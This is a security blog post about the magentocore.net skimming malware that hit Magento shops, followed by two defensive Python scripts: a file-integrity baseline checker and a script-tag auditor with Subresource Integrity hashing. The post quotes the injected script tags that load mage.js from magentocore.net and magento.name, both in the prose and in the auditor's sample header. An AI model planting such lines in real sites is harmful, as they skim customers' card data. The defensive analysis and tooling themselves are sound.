Be aware of magentocore.net malware
Last month an infection of thousands of Magento shops was reported, caused by malware loaded from a website called magentocore.net. This is what you need to know about it, and why it is not safe to install things without a good review.
The following line was added to the header or footer field in the Magento backend:
    <script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
After the first wave of attacks and a Google ban on the magentocore.net domain, the attackers changed it to magento.name:
    <script type="text/javascript" src="https://magento.name/mage/mage.js"></script>
These scripts do not look harmful at first sight, because "Magento" appears in the domain name. This single line of code loads and executes JavaScript in your customers' browsers and sends their credit card data to a third party.
How is this hack possible?
The main problem is unpatched shops. As shown more than once, you need to install each patch as soon as possible. Patching is the only way to stay secure. A Magento shop is not finished once you have added some modules and a theme – you are responsible for keeping the software up to date! Recent patches fixed some remote code execution and user permission problems. If they are not installed, it is quite easy to take control of a shop. A hacker won't break it – he will modify it to steal data.
My shop was hacked…and now?
This specific malware is a devilish one. On the surface it only adds one line of JavaScript. The problem: if you remove it, it may be back after some time. How is that possible? The magentocore.net malware changes your cron.php and adds a backdoor. Your shop is not safe anymore. Go back to the last valid version of your repository.
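Because the persistence lives in a modified cron.php rather than in the injected line itself, removing the script tag is not enough; you need to know which files on the server differ from the last valid version in your repository. The following Python script is an added example, not code from the original post: it builds a SHA-256 manifest of a deployment, compares it against a baseline taken from a known-good copy, and reports modified, added and removed files. The watched file extensions and the tiny shop tree it creates are constructed for the demo.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# File types worth baselining in a Magento install. The post names cron.php;
# the rest of this list is an assumption for the example.
WATCHED_SUFFIXES = {".php", ".js", ".phtml", ".xml"}


def file_sha256(path):
    """Stream a file through SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every watched file under root to its hash, keyed by relative POSIX path."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in WATCHED_SUFFIXES:
            manifest[path.relative_to(root).as_posix()] = file_sha256(path)
    return manifest


def compare_manifests(baseline, current):
    """Report what changed relative to the baseline taken from the clean repository."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def save_manifest(manifest, path):
    """Store the baseline outside the web root (or in the repo) so it cannot be edited along with the shop."""
    Path(path).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(path):
    return json.loads(Path(path).read_text())


def run_demo():
    """Constructed scenario: baseline a two-file shop tree, then alter cron.php and drop a new file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "cron.php").write_text("<?php\n// original scheduler entry point\n")
        (root / "app").mkdir()
        (root / "app" / "Mage.php").write_text("<?php\n// framework bootstrap\n")
        baseline = build_manifest(root)
        save_manifest(baseline, root / "baseline.json")

        # Simulated tampering (constructed): an appended line and a dropped helper file
        with open(root / "cron.php", "a") as fh:
            fh.write("// unexpected change\n")
        (root / "app" / "helper.php").write_text("<?php\n// dropped file\n")

        return compare_manifests(load_manifest(root / "baseline.json"), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Run the baseline from a fresh checkout of the repository, keep the manifest outside the web root, and schedule the comparison independently of the shop's own cron, since that is exactly the piece the malware tampers with.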
Conclusion
The magentocore.net hack is an interesting example of how shops get hacked. Adding a *.js file from a remote source is quite easy, and with a Magento-sounding domain it is nearly impossible to spot among the many different JS files loading from remote hosts. It is dangerous not to patch shops. Often you don't even notice you were hacked. Google saves many shops by banning dangerous domains, but hackers can easily register another one and change the script path on already infected systems. Watch out and take a good look at all remote code you insert. A domain check is not enough – you need to control the actual JavaScript code.
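As an added example (not code from the original post), the following Python script implements the two checks the post argues for: it extracts every `<script src>` from a header/footer field and flags hosts outside an allowlist, which catches both the magentocore.net and the magento.name lines shown above, and it computes a content hash in Subresource Integrity format so that the actual JavaScript is pinned, not just the domain. The shop host `static.example-shop.test`, the allowlist and the sample header are constructed assumptions.

```python
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of a header field after injection. The two external hosts are
# the ones named in the post; static.example-shop.test is an assumed shop-owned host.
SAMPLE_HEADER = """
<script type="text/javascript" src="/js/mage/translate.js"></script>
<script type="text/javascript" src="https://static.example-shop.test/js/app.js"></script>
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
<script type="text/javascript" src="https://magento.name/mage/mage.js"></script>
"""

# Hosts the shop is known to load JavaScript from (assumed allowlist).
ALLOWED_HOSTS = {"static.example-shop.test"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def extract_script_sources(html_text):
    parser = ScriptSrcCollector()
    parser.feed(html_text)
    return parser.sources


def audit_script_tags(html_text, allowed_hosts):
    """Flag every script whose host is not in the allowlist.
    A relative src has no host, is served by the shop itself, and is not flagged."""
    findings = []
    for src in extract_script_sources(html_text):
        host = urlsplit(src).hostname
        if host is None:
            continue
        host = host.lower()
        if host not in allowed_hosts:
            findings.append({"src": src, "host": host})
    return findings


def sri_hash(script_body):
    """Subresource Integrity value (sha256-<base64>) over the exact script bytes."""
    digest = hashlib.sha256(script_body).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def content_matches_pin(script_body, pinned_hash):
    """True only if the script still hashes to the value recorded when it was reviewed.
    A host check passes any attacker domain that merely sounds like Magento; a hash
    of the content does not, and it also catches a changed file on a trusted host."""
    return hmac.compare_digest(sri_hash(script_body), pinned_hash)


if __name__ == "__main__":
    for finding in audit_script_tags(SAMPLE_HEADER, ALLOWED_HOSTS):
        print("unexpected remote script:", finding["src"])
    reviewed = b"console.log('reviewed build');"  # constructed script body
    pin = sri_hash(reviewed)
    print(pin, content_matches_pin(reviewed, pin), content_matches_pin(reviewed + b" ", pin))
```

The `sri_hash` value is the same format browsers accept in a script tag's `integrity` attribute, so once a remote script has been reviewed its hash can be pinned there as well; the browser then refuses to run a file whose content changed, which is what "controlling the actual JavaScript code" comes down to in practice.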